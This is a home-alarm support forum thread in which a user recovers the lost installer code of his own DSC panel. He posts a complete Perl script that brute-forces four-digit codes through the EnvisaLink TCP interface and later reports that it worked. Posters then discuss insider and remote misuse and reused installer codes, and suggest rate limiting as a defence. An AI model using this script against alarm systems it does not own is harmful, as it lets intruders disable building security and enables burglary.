EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: EyezOnRich, GrandWizard

Smith
Posts: 11
Joined: Thu Jan 03, 2019 7:12 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Smith »

mikep wrote:IIRC the "easy" reset didn't work (no relay clicks) -
Hm.. I do have the relay clicks on power cycling, does that indicate that Installer Lockout is enabled, or the opposite?

From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
K-Man wrote:1) Yes, if you're an electrical engineer you should be able to unsolder the EEPROM and create a jig to read back the contents via I2C. But then what? You'd be looking for an unknown set of 2-4 bytes in a 64K haystack.

2) All DSC panels fit in the same footprint within the "can". But you can't buy that one, it is a NEO and not supported. You need a Power panel like the PC1832.
This is all good advice, thank you! PC1832, or PC1616 (only has 6 zones?), check. I just looked quickly on Ebay and there seems to be a few available.

(I thought (somewhat naively perhaps) that the EEPROM used to store the configuration was the same as the firmware chip, and that somehow only part of the EEPROM was electrically erased/re-written on a configuration change.. that one is in a socket and there are cheap USB based programmers/readers on Aliexpress. Wrt the byte location the very loose plan was to read, change a few of the access codes, read again, compare what was changed, and then make some sort of guess.)
mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm
Contact:

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mikep »

From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver
Smith
Posts: 11
Joined: Thu Jan 03, 2019 7:12 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Smith »

mikep wrote:
From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).
Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );
 
# auto-flush on socket
$| = 1;

$socket = new IO::Socket::INET (
   PeerHost => '192.168.---------------------------------ADDRESS OF ENVISALINK---------------------------------',
   PeerPort => '4025',
   Proto => 'tcp',
);

die "cannot connect, $!\n" unless $socket;

print "connected\n";

DSC_get();

DSC_put(DSC_cmd("005", "---------------------------------PASSWORD---------------------------------")); 	# 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && print("correct pass\n");
   /^5000052A.*5050CA/s && print("wrong pass\n") && exit(1);
   /^.*5052CC/s && print("timeout\n") && exit(1);	
}

open OUT, ">log." . zulu() . ".txt";

$t = time;
l0gt();

for ($code = 5000; $code < 5999; $code++) {
   l0gt(); 
   $scode = sprintf("%04d", $code);
   l0g("$scode\n");
   DSC_put(DSC_cmd("071", "1*8"));		# 071 send keys, partition 1, '*8' enter installer mode 
   DSC_get_ww("^922");				# 922 EVL requests installer code
   DSC_put(DSC_cmd("200", $scode));		# 200 send a code
   $r = DSC_get_ww("^6[58]");			# 6XX response 
   l0g($r."\n");
   DSC_put(DSC_cmd("071", "1##"));		# 071 send keys, partition 1, '##' possibly back out of installer menu
   l0g(DSC_get_w()."\n");   
   sleep(0.6);						# wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0g("success\n"); exit(0); }   
}

close OUT;
$socket->close();


sub l0gt {
   l0g("[" . sprintf("%.3f", time - $t) . "]\n");
}

sub l0g {
   my $s = shift;
   print $s; print OUT $s;
}

sub zulu {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = gmtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2dZ", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}


sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_w {		# wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_ww {		# wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   print "sent data '$hreq' (length $size)\n";
}

mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm
Contact:

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mikep »

Any luck? If I've done my math right you should have tried all of them by now...

A handy thing to know if it works, and potentially a selling feature for envisalink... lost install codes does come up once it a while, usually after a move or when leaving an alarm company.

It is a little bit disturbing if it does work - someone with physical access could reset the envisalink (to reset the API password) then run the script to find the installer code. Little chance of that at home but perhaps someone in a commercial environment would have the time... I suppose the same is true on a physical keypad too.
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver
Smith
Posts: 11
Joined: Thu Jan 03, 2019 7:12 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Smith »

mikep wrote:Any luck? If I've done my math right you should have tried all of them by now...

A handy thing to know if it works, and potentially a selling feature for envisalink... lost install codes does come up once it a while, usually after a move or when leaving an alarm company.

It is a little bit disturbing if it does work - someone with physical access could reset the envisalink (to reset the API password) then run the script to find the installer code. Little chance of that at home but perhaps someone in a commercial environment would have the time... I suppose the same is true on a physical keypad too.
Your math is right, I just don't like listening to that beeping too long :-)

So far no luck. I went thru 3000 out of the 10000 codes..
K-Man
Posts: 145
Joined: Fri Jun 01, 2012 1:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by K-Man »

Jeeze, unplug your keypad for a day!

I'm curious to see if it works too.

Let us know

K
Smith
Posts: 11
Joined: Thu Jan 03, 2019 7:12 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Smith »

K-Man wrote:Jeeze, unplug your keypad for a day!
:lol:
K-Man wrote:I'm curious to see if it works too.
mikep wrote:A handy thing to know if it works, and potentially a selling feature for envisalink... lost install codes does come up once it a while, usually after a move or when leaving an alarm company.

It is a little bit disturbing if it does work - someone with physical access could reset the envisalink (to reset the API password) then run the script to find the installer code. Little chance of that at home but perhaps someone in a commercial environment would have the time... I suppose the same is true on a physical keypad too.
It worked. I guess investing in the envisalink saved me buying a new panel, so it's definitely a selling point.

The basic truth is, "if you lose physical access to your system it's not your system anymore."

If I wanted to compromise an alarm system in a commercial environment I would just replace the panel and reprogram it, not run thru all these hoops while on site. The only people who would actually stand to lose anything from this "hack" is someone who sold a locked control panel to a customer, and who would not like the owner to regain control of their property.

If someone would somehow try doing this from the outside without disconnecting the other keypad ... well, the thousands of keypad beeps might tip someone on the inside off that something was amiss.

I guess also keep in mind that a PC5015 is something like 20 years old technology. Nowadays there might be 6 digit installer codes, some automatic installer code attempt count that's turned on by default, etc etc.
Attachments
envisa_DSC.png
envisa_DSC.png (123.84 KiB) Viewed 469223 times
mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm
Contact:

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mikep »

Congrats, and very useful to know!

I was thinking more of an inside job - someone configuring the device so it could be defeated later. Like a lone security guard running it overnight getting ready for a break in during the week after the jewels arrive. Clearly I've been watching too many movies...

Quite a confirmation of how risky it is to expose an envisalink directly to the internet even with a password change!!!
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver
Crikey
Posts: 90
Joined: Mon Aug 22, 2016 10:04 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Crikey »

Smith wrote: It worked. I guess investing in the envisalink saved me buying a new panel, so it's definitely a selling point.
Congratulations! That was an inventive solution to your problem :)
Smith wrote: The basic truth is, "if you lose physical access to your system it's not your system anymore."
Yup. Without physical security you have no security.
Smith wrote: If someone would somehow try doing this from the outside without disconnecting the other keypad ... well, the thousands of keypad beeps might tip someone on the inside off that something was amiss.
Unless the occupants were away from the premises long enough.

And access from the outside isn't all that difficult, what with WiFi. And now even WPA2 is no longer regarded as secure. So...

I wonder if maybe Eyez-On can't detect this and at least slow down the retry interval after too many failed attempts, so as to make such an attack impractical?
Smith
Posts: 11
Joined: Thu Jan 03, 2019 7:12 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Smith »

Crikey wrote:And access from the outside isn't all that difficult, what with WiFi. And now even WPA2 is no longer regarded as secure. So...

I wonder if maybe Eyez-On can't detect this and at least slow down the retry interval after too many failed attempts, so as to make such an attack impractical?
If anything, I would then revise the code with regards to wrong login attempts on the EnvisaLink itself -- this "005 network login" command, and the web configuration interface. Make it user-selectable perhaps.

"Not knowing the installer code of the panel" is actually a much bigger risk than network intrusion.

Because if you don't know it, you can't change it.

And for sure..... if someone else installed the system, there is someone out there who does know it. I get the impression many security companies use the same code across all their installations. Simplifies work out in the field I imagine, but if this installation code get shared around this would also simplify for burglars.

I actually heard a story from a neighbor whose house was burglarized years back, the alarm was disabled "without any possible explanation." He was understandably very upset about it, I guess you can imagine. He had paid a monthly fee to a company, the alarm was just not working, with no explanation whatsoever, and he had a lot of stuff stolen.

I will ask him what alarm system and what company installed it. DSC is a super common alarm system where I live and there are not a lot of companies ..

I haven't tested with my own system, but I imagine that entering installer mode just silences an ongoing alarm?
Post Reply